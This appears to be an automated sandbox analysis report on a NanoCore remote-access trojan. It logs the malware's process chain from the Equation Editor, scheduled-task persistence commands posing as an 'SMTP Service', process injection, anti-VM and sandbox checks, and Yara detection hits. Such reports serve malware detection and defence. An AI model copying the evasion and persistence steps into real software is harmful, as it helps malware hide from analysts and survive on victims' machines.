Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000004.00000002.2090289398.000000000240A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2209835071.00000000023AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2211026677.000000000226A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY
Source: Yara match	File source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY
Source: Yara match	File source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: cat464923.exe, 00000004.00000002.2090289398.000000000240A000.00000004.00000001.sdmp, cat464923.exe, 0000000B.00000002.2211026677.000000000226A000.00000004.00000001.sdmp, smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: cat464923.exe, 00000004.00000002.2090289398.000000000240A000.00000004.00000001.sdmp, cat464923.exe, 0000000B.00000002.2211026677.000000000226A000.00000004.00000001.sdmp, smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\AppData\Roaming\cat464923.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\cat464923.exe	Window / User API: threadDelayed 7770
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Window / User API: threadDelayed 1932
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Window / User API: foregroundWindowGot 501

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2448	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 2340	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 2656	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 3020	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 2488	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\taskeng.exe TID: 2512	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 2344	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 2936	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 3044	Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2240	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2292	Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2220	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 2448	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2808	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2568	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Roaming\cat464923.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477

Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Source: C:\Users\user\AppData\Roaming\cat464923.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\cat464923.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\cat464923.exe	Memory written: C:\Users\user\AppData\Roaming\cat464923.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Memory written: C:\Users\user\AppData\Roaming\cat464923.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory written: C:\Program Files (x86)\SMTP Service\smtpsvc.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory written: C:\Program Files (x86)\SMTP Service\smtpsvc.exe base: 400000 value starts with: 4D5A

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\cat464923.exe C:\Users\user\AppData\Roaming\cat464923.exe
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process created: C:\Users\user\AppData\Roaming\cat464923.exe {path}
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp60E5.tmp'
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp4F5A.tmp'
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\cat464923.exe C:\Users\user\AppData\Roaming\cat464923.exe 0
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process created: C:\Users\user\AppData\Roaming\cat464923.exe {path}
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}

Source: cat464923.exe, 00000005.00000002.2348187479.0000000002522000.00000004.00000001.sdmp	Binary or memory string: Program Manager480m<RX
Source: cat464923.exe, 00000005.00000002.2350970656.00000000029C2000.00000004.00000001.sdmp, taskeng.exe, 0000000A.00000002.2347157070.00000000008B0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: cat464923.exe, 00000005.00000002.2347908257.0000000000CB0000.00000002.00000001.sdmp, taskeng.exe, 0000000A.00000002.2347157070.00000000008B0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: cat464923.exe, 00000005.00000002.2348187479.0000000002522000.00000004.00000001.sdmp	Binary or memory string: Program Manager480m<+W
Source: cat464923.exe, 00000005.00000002.2348187479.0000000002522000.00000004.00000001.sdmp	Binary or memory string: Program Manager480m
Source: cat464923.exe, 00000005.00000002.2352118434.00000000057FC000.00000004.00000001.sdmp	Binary or memory string: kProgram Manager
Source: cat464923.exe, 00000005.00000002.2348187479.0000000002522000.00000004.00000001.sdmp	Binary or memory string: Program Manager480m0
Source: cat464923.exe, 00000005.00000002.2347908257.0000000000CB0000.00000002.00000001.sdmp, taskeng.exe, 0000000A.00000002.2347157070.00000000008B0000.00000002.00000001.sdmp	Binary or memory string: !Progman
Source: cat464923.exe, 00000005.00000002.2348265512.00000000025C2000.00000004.00000001.sdmp	Binary or memory string: Program Manager480mx
Source: cat464923.exe, 00000005.00000002.2350970656.00000000029C2000.00000004.00000001.sdmp	Binary or memory string: Program ManagerTV0m
Source: cat464923.exe, 00000005.00000002.2348265512.00000000025C2000.00000004.00000001.sdmp	Binary or memory string: Program Manager480ma
Source: cat464923.exe, 00000005.00000002.2348265512.00000000025C2000.00000004.00000001.sdmp	Binary or memory string: Program Manager480mPvf
Source: cat464923.exe, 00000005.00000002.2348265512.00000000025C2000.00000004.00000001.sdmp	Binary or memory string: Program Manager480m\|

Source: C:\Users\user\AppData\Roaming\cat464923.exe	Queries volume information: C:\Users\user\AppData\Roaming\cat464923.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Queries volume information: C:\Users\user\AppData\Roaming\cat464923.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Queries volume information: C:\Users\user\AppData\Roaming\cat464923.exe VolumeInformation
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Queries volume information: C:\Users\user\AppData\Roaming\cat464923.exe VolumeInformation
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation

Source: C:\Users\user\AppData\Roaming\cat464923.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2348105483.0000000002491000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY
Source: Yara match	File source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY
Source: Yara match	File source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY
Source: Yara match	File source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY
Source: Yara match	File source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.34e019c.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.4a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.32d019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.33a019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.33547c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.34e47c5.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.335019c.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.32d019c.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: cat464923.exe, 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: cat464923.exe, 00000005.00000002.2347454023.0000000000440000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: cat464923.exe, 00000005.00000002.2347454023.0000000000440000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisable